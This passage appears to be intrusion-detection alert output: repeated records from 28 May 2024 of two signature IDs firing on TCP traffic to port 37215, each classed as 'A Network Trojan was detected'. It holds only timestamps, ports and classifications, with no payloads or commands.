          Timestamp:05/28/24-14:47:21.117089
          SID:2835222
          Source Port:60322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.931427
          SID:2829579
          Source Port:46390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557626
          SID:2829579
          Source Port:43570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178979
          SID:2829579
          Source Port:56252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.340989
          SID:2829579
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680682
          SID:2835222
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301023
          SID:2835222
          Source Port:43696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634214
          SID:2829579
          Source Port:59710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066525
          SID:2829579
          Source Port:50642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156227
          SID:2829579
          Source Port:56388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979352
          SID:2835222
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724645
          SID:2835222
          Source Port:52610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167611
          SID:2835222
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161758
          SID:2829579
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681248
          SID:2835222
          Source Port:40636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512332
          SID:2835222
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326057
          SID:2829579
          Source Port:46840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474735
          SID:2829579
          Source Port:41254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923490
          SID:2835222
          Source Port:37002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809936
          SID:2835222
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819824
          SID:2829579
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985041
          SID:2835222
          Source Port:37920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710768
          SID:2835222
          Source Port:44408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976688
          SID:2835222
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.224257
          SID:2829579
          Source Port:37094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.073955
          SID:2829579
          Source Port:59782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177180
          SID:2829579
          Source Port:50118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958634
          SID:2829579
          Source Port:40030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131746
          SID:2835222
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543369
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156079
          SID:2835222
          Source Port:41676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923237
          SID:2835222
          Source Port:50070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115395
          SID:2835222
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176788
          SID:2835222
          Source Port:47896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463450
          SID:2829579
          Source Port:45072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336927
          SID:2829579
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922073
          SID:2835222
          Source Port:55998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485706
          SID:2829579
          Source Port:50488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729607
          SID:2829579
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812848
          SID:2829579
          Source Port:37178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848378
          SID:2835222
          Source Port:52724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922413
          SID:2829579
          Source Port:56384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242153
          SID:2835222
          Source Port:58770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507822
          SID:2829579
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712085
          SID:2835222
          Source Port:53720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.359080
          SID:2829579
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538932
          SID:2829579
          Source Port:49828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730331
          SID:2835222
          Source Port:59190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780392
          SID:2829579
          Source Port:44868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039097
          SID:2835222
          Source Port:44430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068156
          SID:2829579
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215042
          SID:2835222
          Source Port:33826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.677718
          SID:2829579
          Source Port:58468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845771
          SID:2829579
          Source Port:45812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729155
          SID:2829579
          Source Port:45056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215354
          SID:2835222
          Source Port:53476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.304134
          SID:2829579
          Source Port:60602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300469
          SID:2835222
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793902
          SID:2829579
          Source Port:45976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222400
          SID:2829579
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182241
          SID:2829579
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727978
          SID:2829579
          Source Port:40094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.207024
          SID:2829579
          Source Port:50810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092702
          SID:2829579
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.849285
          SID:2835222
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269269
          SID:2829579
          Source Port:42594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112909
          SID:2829579
          Source Port:39688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405413
          SID:2829579
          Source Port:50000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652391
          SID:2835222
          Source Port:36406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248564
          SID:2835222
          Source Port:53920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992335
          SID:2835222
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538865
          SID:2829579
          Source Port:34396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439298
          SID:2835222
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339722
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270289
          SID:2835222
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525779
          SID:2829579
          Source Port:54488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728019
          SID:2835222
          Source Port:45464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680358
          SID:2829579
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463978
          SID:2835222
          Source Port:58240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959034
          SID:2829579
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131763
          SID:2829579
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481338
          SID:2835222
          Source Port:58772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841953
          SID:2829579
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484966
          SID:2835222
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115627
          SID:2835222
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327933
          SID:2829579
          Source Port:51690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297373
          SID:2835222
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630530
          SID:2835222
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663808
          SID:2829579
          Source Port:55984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284977
          SID:2829579
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.284299
          SID:2829579
          Source Port:37214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.924006
          SID:2829579
          Source Port:42872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685455
          SID:2829579
          Source Port:43208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743504
          SID:2835222
          Source Port:42204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778922
          SID:2829579
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462984
          SID:2829579
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141748
          SID:2829579
          Source Port:58028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926627
          SID:2829579
          Source Port:38974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206404
          SID:2835222
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695827
          SID:2835222
          Source Port:47414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.336949
          SID:2835222
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441499
          SID:2835222
          Source Port:40820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770881
          SID:2835222
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543318
          SID:2829579
          Source Port:37494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299062
          SID:2829579
          Source Port:55250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.049044
          SID:2835222
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125675
          SID:2829579
          Source Port:56346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033250
          SID:2835222
          Source Port:45730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878600
          SID:2835222
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655798
          SID:2829579
          Source Port:56338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296283
          SID:2829579
          Source Port:55190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657060
          SID:2829579
          Source Port:52936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709090
          SID:2835222
          Source Port:34576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891527
          SID:2835222
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.038553
          SID:2835222
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771595
          SID:2835222
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472712
          SID:2835222
          Source Port:46652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932697
          SID:2835222
          Source Port:37770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211461
          SID:2829579
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891924
          SID:2835222
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794123
          SID:2829579
          Source Port:55636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157563
          SID:2829579
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480733
          SID:2835222
          Source Port:49574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.092739
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066223
          SID:2835222
          Source Port:53276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756822
          SID:2829579
          Source Port:33864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594519
          SID:2835222
          Source Port:49746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142554
          SID:2829579
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870764
          SID:2835222
          Source Port:36048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.987832
          SID:2829579
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185754
          SID:2829579
          Source Port:55210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.949435
          SID:2829579
          Source Port:53004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893279
          SID:2829579
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269833
          SID:2835222
          Source Port:33676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115831
          SID:2835222
          Source Port:39256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300342
          SID:2835222
          Source Port:41424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035520
          SID:2835222
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979049
          SID:2829579
          Source Port:59860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283934
          SID:2829579
          Source Port:45264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.695732
          SID:2829579
          Source Port:47782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987334
          SID:2829579
          Source Port:45484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988619
          SID:2835222
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465283
          SID:2829579
          Source Port:46314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044576
          SID:2829579
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325704
          SID:2829579
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797929
          SID:2835222
          Source Port:50844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594993
          SID:2829579
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855193
          SID:2835222
          Source Port:45162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048716
          SID:2829579
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281793
          SID:2829579
          Source Port:35814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399513
          SID:2835222
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847533
          SID:2829579
          Source Port:56762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322260
          SID:2835222
          Source Port:58754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.894020
          SID:2835222
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178100
          SID:2829579
          Source Port:48234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472599
          SID:2829579
          Source Port:33876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976698
          SID:2829579
          Source Port:56394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548588
          SID:2829579
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839833
          SID:2835222
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868655
          SID:2835222
          Source Port:38070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684953
          SID:2829579
          Source Port:34730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466385
          SID:2835222
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846271
          SID:2829579
          Source Port:43280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878695
          SID:2835222
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.856712
          SID:2829579
          Source Port:58698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752885
          SID:2829579
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.281625
          SID:2835222
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803184
          SID:2829579
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065731
          SID:2829579
          Source Port:38930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889930
          SID:2829579
          Source Port:51640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223938
          SID:2829579
          Source Port:42998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764718
          SID:2829579
          Source Port:43428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178869
          SID:2835222
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631805
          SID:2829579
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794876
          SID:2835222
          Source Port:42816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741667
          SID:2829579
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707959
          SID:2829579
          Source Port:57976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988939
          SID:2829579
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593011
          SID:2835222
          Source Port:47810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273253
          SID:2829579
          Source Port:33394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842926
          SID:2835222
          Source Port:46986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535106
          SID:2829579
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299736
          SID:2829579
          Source Port:59518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680397
          SID:2835222
          Source Port:39940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473294
          SID:2835222
          Source Port:43842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588938
          SID:2829579
          Source Port:36030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.039087
          SID:2835222
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434226
          SID:2829579
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272328
          SID:2829579
          Source Port:44944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711552
          SID:2835222
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493104
          SID:2835222
          Source Port:60902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538834
          SID:2835222
          Source Port:41232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062049
          SID:2835222
          Source Port:38882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441697
          SID:2829579
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846991
          SID:2835222
          Source Port:47988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665205
          SID:2829579
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.532923
          SID:2829579
          Source Port:50792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291497
